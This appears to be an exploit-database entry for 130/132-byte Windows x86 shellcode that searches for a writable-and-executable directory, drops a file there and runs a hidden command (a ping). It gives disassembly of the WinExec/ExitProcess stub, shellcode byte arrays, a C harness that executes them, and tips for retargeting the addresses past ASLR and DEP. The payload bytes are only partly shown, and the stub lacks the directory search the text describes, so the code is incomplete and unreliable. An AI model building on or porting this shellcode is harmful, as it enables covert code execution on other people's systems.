Windows/x86 - Executable Directory Search Shellcode (130 bytes)

Reporter Krzysztof Przybylski
Modified 2017-02-27T00:00:00


Exploit for win32 platform

# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes
What it does: a writable-and-executable directory searcher. It starts at C:\ and walks the tree; when it finds a directory it can both write to and execute from, it drops a file there, runs it (a ping) and exits. A directory that is writable but not executable is skipped and the search continues.

Tested on WinXP SP1. The two dwords at the head of the data block, 0x77e6fd35 (exec) and 0x77e798fd (exit), are absolute kernel32 addresses for that build. They differ on other service packs and builds, and move with ASLR from Vista on, so for any other target they must be re-pointed or resolved at runtime instead of hardcoded.

Build the test harness with:
i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:
The 132-byte variant stores the command string without its terminating NUL and writes the terminator at runtime. In the loader stub below, pop ecx takes the address pushed by the call that reached the stub, which is where the data block starts (the usual call/pop trick); xor eax,eax zeroes eax and mov BYTE PTR [ecx+0x64],al drops the NUL at offset 0x64 of the data block; push eax / push ecx / call 0x77e6fd35 passes the string and a zero, matching the WinExec(lpCmdLine, uCmdShow) prototype with uCmdShow = SW_HIDE; push 0 / call 0x77e798fd matches ExitProcess(0). The stub was disassembled in gdb:
(gdb) disassemble 
Dump of assembler code for function function:
=> 0x08048062 <+0>:    pop    ecx
   0x08048063 <+1>:   xor    eax,eax
   0x08048065 <+3>:   mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:   push   eax
   0x08048069 <+7>:   push   ecx
   0x0804806a <+8>:   mov    eax,0x77e6fd35
   0x0804806f <+13>:  call   eax
   0x08048071 <+15>:  xor    eax,eax
   0x08048073 <+17>:  push   eax
   0x08048074 <+18>:  mov    eax,0x77e798fd
   0x08048079 <+23>:  call   eax
NULL-free shellcode (132 bytes; only the head of the data block is reproduced on this page):
"\x35\xfd\xe6\x77"                      // exec  (0x77e6fd35, little-endian)
"\xfd\x98\xe7\x77"                      // exit  (0x77e798fd, little-endian)
"\x63\x3a\x5c"                          // C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 172.1.1.1
// NULL version (130 bytes; only the head of the data block is reproduced on this page):
char code[] =
"\x35\xfd\xe6\x77"                      // exec  (0x77e6fd35, little-endian)
"\xfd\x98\xe7\x77"                      // exit  (0x77e798fd, little-endian)
"\x63\x3a\x5c"                          // C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 172.1.1.1
// remaining bytes of the 130-byte payload not reproduced on this page
;

int main(int argc, char **argv)
{
        int (*func)();
        func = (int (*)()) code;   // treat the byte array as code
        return func();             // jump into the shellcode
}

The harness keeps the shellcode in a writable data section and jumps straight into it. That works on XP SP1, which has no DEP; on a system that enforces DEP for the process, copy the bytes into memory obtained from VirtualAlloc with PAGE_EXECUTE_READWRITE before calling them.

